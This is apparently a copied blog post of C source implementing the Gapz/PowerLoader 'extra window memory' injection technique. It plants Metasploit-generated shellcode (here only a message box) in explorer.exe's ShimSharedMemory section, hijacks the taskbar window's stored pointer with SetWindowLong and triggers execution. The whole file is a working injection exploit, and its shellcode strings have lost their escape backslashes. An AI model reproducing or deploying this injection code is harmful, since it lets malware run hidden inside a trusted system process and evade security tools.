gapz注入代码

#include <stdio.h>

#include <windows.h>
#include <winternl.h>
#include <string.h>
#include <tlhelp32.h>

// ASCII marker
#define MARKER "I'm in ur address-space man!"
#define SIZE_MARKER strlen(MARKER)

// Declarations
#define STATUS_SUCCESS ((NTSTATUS)0)

typedef enum _SECTION_INHERIT {
  ViewShare = 1,
  ViewUnmap = 2
} SECTION_INHERIT, *PSECTION_INHERIT;

extern "C"
{
    NTSTATUS NTAPI ZwOpenSection(
      PHANDLE SectionHandle,
      ACCESS_MASK DesiredAccess,
      POBJECT_ATTRIBUTES ObjectAttributes
    );

    NTSTATUS NTAPI ZwClose(
      HANDLE Handle
    );

    NTSTATUS NTAPI ZwUnmapViewOfSection(
      HANDLE ProcessHandle,
      PVOID BaseAddress
    );

    NTSTATUS NTAPI ZwMapViewOfSection(
      HANDLE SectionHandle,
      HANDLE ProcessHandle,
      PVOID *BaseAddress,
      ULONG_PTR ZeroBits,
      SIZE_T CommitSize,
      PLARGE_INTEGER SectionOffset,
      PSIZE_T ViewSize,
      SECTION_INHERIT InheritDisposition,
      ULONG AllocationType,
      ULONG Win32Protect
    );
}

// Definitions

VOID fatal_error(PCHAR msg)
{
    fprintf(stderr, "%s ", msg);
    ExitProcess(0);
}

DWORD find_marker_in_region(PCHAR buffer, DWORD size)
{
    if(SIZE_MARKER > size)
        fatal_error("Failed in" __FUNCTION__);
    
    for(DWORD i = 0; i < (size - SIZE_MARKER); ++i)
        if(memcmp(buffer + i, MARKER, SIZE_MARKER) == 0)
            return i;

    return 0xffffffff;
}

DWORD get_explorer_pid()
{
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32 = {0};
    DWORD explorer_pid = 0;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hProcessSnap == INVALID_HANDLE_VALUE)
        fatal_error("Failed in " __FUNCTION__);

    pe32.dwSize = sizeof(PROCESSENTRY32);

    if(!Process32First(hProcessSnap, &pe32))
        fatal_error("Failed in " __FUNCTION__);

    do
    {
        if(strcmp(pe32.szExeFile, "explorer.exe") == 0)
        {
            explorer_pid = pe32.th32ProcessID;
            break;
        }
    } while(Process32Next(hProcessSnap, &pe32));

    CloseHandle(hProcessSnap);
    if(explorer_pid == 0)
        fatal_error("Failed in " __FUNCTION__);

    return explorer_pid;
}

DWORD find_marker_in_explorer(HANDLE hProcess, DWORD base_address_region, DWORD size_region)
{
    DWORD size_read, idx_marker;
    PCHAR buffer = (PCHAR)malloc(size_region);

    if(buffer == 0)
        fatal_error("Failed in " __FUNCTION__);

    if(ReadProcessMemory(
        hProcess,
        (LPVOID)base_address_region,
        buffer,
        size_region,
        &size_read
    ) == FALSE)
        return 0;

    idx_marker = find_marker_in_region(buffer, size_region);
    if(idx_marker == 0xffffffff)
        return 0;

    free(buffer);
    return base_address_region + idx_marker + SIZE_MARKER;
}

DWORD get_shellcode_address()
{
    HANDLE hProcess;
    DWORD pid_explorer = get_explorer_pid(), base_address = 0,
        shellcode_address = 0, bytes_read,
        first_indirection, second_indirection;
    MEMORY_BASIC_INFORMATION mem_info = {0};

    if(pid_explorer == 0)
        fatal_error("Failed in " __FUNCTION__);

    printf("        Explorer.exe's PID: %d ", pid_explorer);
    hProcess = OpenProcess(
        PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
        FALSE,
        pid_explorer
    );

    if(hProcess == NULL)
        fatal_error("Failed in " __FUNCTION__);

    while(TRUE)
    {
        bytes_read = VirtualQueryEx(
            hProcess,
            (PVOID)base_address,
            &mem_info,
            sizeof(mem_info)
        );

        if(bytes_read != sizeof(mem_info))
            return 0;

        printf("        Looking for the marker in [%.8x - %.8x].. ", base_address, base_address + mem_info.RegionSize);
        if((shellcode_address = find_marker_in_explorer(hProcess, base_address, mem_info.RegionSize)) != 0)
            break;

        base_address += mem_info.RegionSize;
    }

    /*
        In the shared section we have:
        address: 0x1337 [0x0000133b][0x0000133f][Payload]

        CPU Disasm
        Address   Hex dump          Command                                  Comments
        01001B4A  |.  8B06          MOV EAX,DWORD PTR [ESI] ; ESI is a pointer on the value we give at SetWindowLong (that's why we need two indirection)
        01001B4C  |.  56            PUSH ESI
        01001B4D      FF10          CALL DWORD PTR [EAX]

        First, ESI=0x1337
        Then EAX = 0x133b
        Finally CALL [0x133b] = CALL 0x133f => BOOM    
    */
    first_indirection = shellcode_address + 4;
    printf("Writing %.8x @ %.8x ", first_indirection, shellcode_address);
    WriteProcessMemory(
        hProcess,
        (PVOID)shellcode_address,
        &first_indirection,
        sizeof(DWORD),
        NULL
    );

    second_indirection = first_indirection + 4;
    printf("Writing %.8x @ %.8x ", second_indirection, shellcode_address + 4);
    WriteProcessMemory(
        hProcess,
        (PVOID)(shellcode_address + 4),
        &second_indirection,
        sizeof(DWORD),
        NULL
    );

    return shellcode_address;
}

BOOL write_shellcode_in_shared_section()
{
    /*
    C:metasploitmsf3>.. ubyin uby.exe msfpayload windows/messagebox TITLE="0vercl0k iz in your explorer man!" TEXT="Hi from the explorer dewd o/" P
    # windows/messagebox - 315 bytes
    # http://www.metasploit.com
    # VERBOSE=false, EXITFUNC=process, TITLE=0vercl0k iz in your explorer man!, TEXT=Hi from the explorer dewd o/, ICON=NO
    my $buf =
    "xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64" .
    "x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e" .
    "x20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60" .
    "x8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8b" .
    "x4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01" .
    "xeex31xffx31xc0xfcxacx84xc0x74x07xc1xcfx0d" .
    "x01xc7xebxf4x3bx7cx24x28x75xe1x8bx5ax24x01" .
    "xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01" .
    "xe8x89x44x24x1cx61xc3xb2x08x29xd4x89xe5x89" .
    "xc2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45" .
    "x04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxff" .
    "xffx89x45x08x68x6cx6cx20x41x68x33x32x2ex64" .
    "x68x75x73x65x72x88x5cx24x0ax89xe6x56xffx55" .
    "x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52xe8" .
    "x61xffxffxffx68x21x58x20x20x68x20x6dx61x6e" .
    "x68x6fx72x65x72x68x65x78x70x6cx68x6fx75x72" .
    "x20x68x69x6ex20x79x68x20x69x7ax20x68x63x6c" .
    "x30x6bx68x30x76x65x72x31xdbx88x5cx24x21x89" .
    "xe3x68x58x20x20x20x68x64x20x6fx2fx68x20x64" .
    "x65x77x68x6fx72x65x72x68x65x78x70x6cx68x74" .
    "x68x65x20x68x72x6fx6dx20x68x48x69x20x66x31" .
    "xc9x88x4cx24x1cx89xe1x31xd2x52x53x51x52xff" .
    "xd0x31xc0x50xffx55x08";
    */
    UCHAR payload[] = "xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7ex20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60x8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01xeex31xffx31xc0xfcxacx84xc0x74x07xc1xcfx0dx01xc7xebxf4x3bx7cx24x28x75xe1x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8x89x44x24x1cx61xc3xb2x08x29xd4x89xe5x89xc2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45x04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxffxffx89x45x08x68x6cx6cx20x41x68x33x32x2ex64x68x75x73x65x72x88x5cx24x0ax89xe6x56xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52xe8x61xffxffxffx68x21x58x20x20x68x20x6dx61x6ex68x6fx72x65x72x68x65x78x70x6cx68x6fx75x72x20x68x69x6ex20x79x68x20x69x7ax20x68x63x6cx30x6bx68x30x76x65x72x31xdbx88x5cx24x21x89xe3x68x58x20x20x20x68x64x20x6fx2fx68x20x64x65x77x68x6fx72x65x72x68x65x78x70x6cx68x74x68x65x20x68x72x6fx6dx20x68x48x69x20x66x31xc9x88x4cx24x1cx89xe1x31xd2x52x53x51x52xffxd0x31xc0x50xffx55x08";
    NTSTATUS result;
    BOOL ret = TRUE;
    HANDLE hSection = INVALID_HANDLE_VALUE;
    UNICODE_STRING obj_name = {0};
    OBJECT_ATTRIBUTES obj = {0};
    PUCHAR base_address_view = 0;
    SIZE_T viewsize = 0;

    RtlInitUnicodeString(&obj_name, L"\BaseNamedObjects\ShimSharedMemory");
    
    InitializeObjectAttributes(
        &obj,
        &obj_name,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL
    );

    printf("   Opening the section..");
    result = ZwOpenSection(
        &hSection,
        GENERIC_WRITE,
        &obj
    );

    if(result != STATUS_SUCCESS)
    {
        printf("Failed in " __FUNCTION__ ": %.8x. ", result);
        ret = FALSE;
        goto clean;
    }

    printf("OK ");

    printf("   Map-ing a view of this section in our address space..");
    result = ZwMapViewOfSection(
        hSection,
        GetCurrentProcess(),
        (PVOID*)&base_address_view,
        (ULONG_PTR)NULL,
        0,
        NULL,
        &viewsize,
        ViewUnmap,
        0,
        PAGE_READWRITE
    );

    if(result != STATUS_SUCCESS)
    {
        printf("Failed in " __FUNCTION__ ": %.8x. ", result);
        ret = FALSE;
        goto clean;
    }

    printf("OK at %.8x (%d bytes). ", base_address_view, viewsize);

    printf("   Writing the payload in the shared section..");
    memcpy((base_address_view + viewsize) - (sizeof(payload) + SIZE_MARKER + 4 + 4), MARKER, SIZE_MARKER);
    memcpy(((base_address_view + viewsize) - sizeof(payload)), payload, sizeof(payload));
    printf("OK. ");

    clean:
    if(hSection != INVALID_HANDLE_VALUE)
    {
        ZwUnmapViewOfSection(GetCurrentProcess(), base_address_view);
        ZwClose(hSection);
    }
    
    return ret;
}

BOOL modify_winproc_taskbar_window()
{
    BOOL ret = TRUE;
    HWND hTaskbarWindow = FindWindow("Shell_TrayWnd", NULL);
    LONG taskbarWinproc = 0;
    DWORD shellcode_address = 0;

    printf("   Where are you Shell_TrayWnd, where are you..");
    if(hTaskbarWindow == 0)
    {
        printf("Failed in " __FUNCTION__ ". ");
        ret = FALSE;
        goto clean;
    }

    printf("OK. ");

    printf("   Retrieving its windows procedure..");
    taskbarWinproc = GetWindowLong(hTaskbarWindow, 0);

    if(taskbarWinproc == 0)
    {
        printf("Failed in " __FUNCTION__ ". ");
        ret = FALSE;
        goto clean;
    }

    printf("OK at %.8x. ", taskbarWinproc);

    printf("   Getting the shellcode address.. ");
    shellcode_address = get_shellcode_address();
    if(shellcode_address == 0)
    {
        printf("Failed in " __FUNCTION__ ". ");
        ret = FALSE;
        goto clean;
    }

    printf("OK at 0x%.8x. ", shellcode_address);

    printf("   Setting the windows procedure ..");
    SetWindowLong(hTaskbarWindow, 0, shellcode_address);
    printf("OK. ");

    printf("   Pulling the trigger, BRAAAAAA ");
    SendNotifyMessage(
        hTaskbarWindow,
        0xf,
        0,
        0
    );

    Sleep(1);

    printf("   Putting back its winproc ");
    SetWindowLong(hTaskbarWindow, 0, taskbarWinproc);

    clean:
    return ret;
}

int main()
{
    printf("1] Writing the shellcode in the shared section mapped in explorer.exe's address space ");
    if(write_shellcode_in_shared_section() == FALSE)
        return -1;

    printf(" 2] Looking for the taskbar window, a pointer onto shellcode in the explorer's memory and modify its windows procedure ");
    if(modify_winproc_taskbar_window() == FALSE)
        return -1;

    printf(" 3] Profit! ");
    return 0;
}

---恢复内容结束---